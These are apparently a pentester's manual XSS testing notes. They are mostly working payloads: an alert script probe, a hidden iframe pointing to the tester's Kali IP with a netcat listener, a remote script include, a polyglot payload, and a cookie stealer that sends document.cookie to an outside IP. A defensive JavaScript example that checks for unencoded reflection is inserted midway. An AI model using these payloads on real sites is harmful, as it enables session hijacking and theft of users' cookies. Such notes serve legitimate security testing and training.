XSS manual testing

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html

#Special characters that indicate the possibility of XSS

< > ' " { } ;

hello";<>
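Added example (not part of the original notes): a check, from the defender's side, of which characters of the probe hello";<> a page reflects without encoding, run against a vulnerable and a hardened version of the same template. renderVulnerable, renderHardened, encodeHtml and rawReflected are hypothetical names and the page bodies are constructed.

```javascript
// Added example. renderVulnerable/renderHardened stand in for a server-side
// template (hypothetical); PROBE is a constructed test string.
const PROBE = 'hello";<>';

// HTML-encode for element content and quoted attribute values.
function encodeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderVulnerable(q) { return '<p>Results for ' + q + '</p>'; }
function renderHardened(q) { return '<p>Results for ' + encodeHtml(q) + '</p>'; }

// Walk the reflection that follows `marker` and return the probe characters
// that came back unencoded. Returns null if the marker is not reflected.
function rawReflected(marker, chars, body) {
  let pos = body.indexOf(marker);
  if (pos === -1) return null;
  pos += marker.length;
  const raw = [];
  for (const ch of chars) {
    const entity = /^&(#x?[0-9a-f]+|[a-z]+);/i.exec(body.slice(pos));
    if (entity) {
      pos += entity[0].length;   // returned as an HTML entity: encoded
    } else if (body[pos] === ch) {
      raw.push(ch);              // returned as-is: not encoded
      pos += 1;
    }                            // otherwise stripped by a filter: skip it
  }
  return raw;
}

console.log(rawReflected('hello', '";<>', renderVulnerable(PROBE)));
console.log(rawReflected('hello', '";<>', renderHardened(PROBE)));
```

The semicolon stays raw after HTML encoding, which is harmless in element content. If the reflection lands inside a script block or an event handler, HTML encoding is the wrong encoder and JavaScript-context encoding is needed.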

Try:

<script>alert('XSS')</script>  #careful with the font of the single quotes (they must be plain straight quotes)

#Content injection : redirecting user to malicious content

Embed an iframe within html code:

<iframe src=http://$KaliIP:80/report height='0' width='0'></iframe>

#netcat listener on port 80

nc -nvlp 80

#Submit the XSS payload through some login form / blog / query tab

#Shell

#Steal PHP session ID

<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>

#Polyglot XSS payload

javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

#Cookie stealer

<script>new Image().src="http://11.11.11.11/cool.jpg?output="+document.cookie;</script>
